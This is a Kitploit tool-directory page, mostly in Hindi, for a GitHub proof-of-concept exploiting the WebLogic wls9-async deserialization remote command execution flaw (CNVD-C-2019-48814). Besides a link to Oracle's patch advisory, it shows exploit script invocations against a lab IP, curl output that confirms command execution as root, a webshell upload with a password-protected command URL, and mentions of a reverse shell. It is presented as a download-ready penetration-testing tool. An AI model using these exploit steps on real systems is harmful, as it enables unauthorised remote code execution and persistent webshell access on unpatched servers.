Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
Log in
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

फ़ीडसंपर्कगोपनीयता© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CNVD-C-2019-48814 — WebLogic wls9-async डिसीरियलाइज़ेशन रिमोट कमांड निष्पादन भेद्यता | Kitploit
उपकरण/GitHubGitHub/jas502n/cnvd-c-2019-48814
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरिमोट एक्सेस टूल
GitHubjas502n/cnvd-c-2019-48814

CNVD-C-2019-48814

WebLogic wls9-async डिसीरियलाइज़ेशन रिमोट कमांड निष्पादन भेद्यता

रिपॉजिटरी देखें
23991107 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CNVD-C-2019-48814

WebLogic wls9-async डिसेरिएलाइज़ेशन रिमोट कमांड निष्पादन भेद्यता

weblogic के लिए रिटर्न poc

पैच अपडेट:


https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2725-5466295.html

भेद्यता प्रजनन:

http://10.10.20.166:7001/_async/AsyncResponseService
curl -i http://10.10.20.166:7001/_async/favicon.ico

CNVD-C-2019-48814 वीडियो

CNVD-C-2019-48814

python CNVD-C-2019-48814.py -u  http://10.10.20.166:7001  -p 1.txt

>>>>Common See:

write website favicon.ico
Don't Need RMI Server

http://10.10.20.166:7001/_async/favicon.ico

>>>>Request Success!
status_code:202

C:\Users\CTF\Desktop\weblogic\byte>curl -i http://10.10.20.166:7001/_async/favicon.ico
HTTP/1.1 200 OK
Date: Thu, 25 Apr 2019 14:37:49 GMT
Accept-Ranges: bytes
Content-Length: 5
Last-Modified: Thu, 25 Apr 2019 14:37:45 GMT
X-Powered-By: Servlet/2.5 JSP/2.1

root

RMI का उपयोग करें

CVE-2017-10271 कोई पैच नहीं

windows-linux-webshell

upadte: 自定义webshell名字,适用于windows or linux upload webshell

python async_webshell-all.py  http://10.10.20.166:7001/ webshell.jsp
>>>Webshell:
http://10.10.20.166:7001//bea_wls_internal/webshell.jsp?pwd=123&cmd=whoami

resever_shell

कमांड देखें

webshell

टूल डाउनलोड करें